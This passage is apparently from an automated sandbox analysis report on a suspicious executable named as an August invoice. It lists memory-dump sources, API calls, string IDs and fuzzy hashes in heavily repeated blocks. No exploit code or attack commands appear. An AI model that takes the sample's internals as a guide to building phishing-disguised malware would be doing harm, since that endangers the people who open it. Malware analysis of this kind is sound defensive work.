                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: \$h
                                                          • API String ID: 4104443479-677774858
                                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID: &
                                                          • API String ID: 2931989736-1010288
                                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: \
                                                          • API String ID: 4104443479-2967466578
                                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00466825
                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_wcslen
                                                          • String ID: |
                                                          • API String ID: 596671847-2343686810
                                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                          APIs
                                                          • _strlen.LIBCMT ref: 0040F858
                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_sprintf_strlen
                                                          • String ID: %02X
                                                          • API String ID: 1921645428-436463671
                                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: htonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 3832099526-2422070025
                                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID: <local>
                                                          • API String ID: 2038078732-4266983199
                                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __fread_nolock_memmove
                                                          • String ID: EA06
                                                          • API String ID: 1988441806-3962188686
                                                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: u,D
                                                          • API String ID: 4104443479-3858472334
                                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • _memmove.LIBCMT ref: 00401B57
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                          • String ID: @EXITCODE
                                                          • API String ID: 2734553683-3436989551
                                                          • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                          • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                          • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                          • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                          APIs
                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • wsprintfW.USER32 ref: 0045612A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend_mallocwsprintf
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 1262938277-328681919
                                                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                          APIs
                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                          • InternetCloseHandle.WININET ref: 00442668
                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                          • String ID: aeB
                                                          • API String ID: 857135153-906807131
                                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                          APIs
                                                          Strings
                                                          • ^B, xrefs: 00433248
                                                          • C:\Users\user\Desktop\NVOICE FOR THE MONTH OF AUG-24.exe, xrefs: 0043324B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
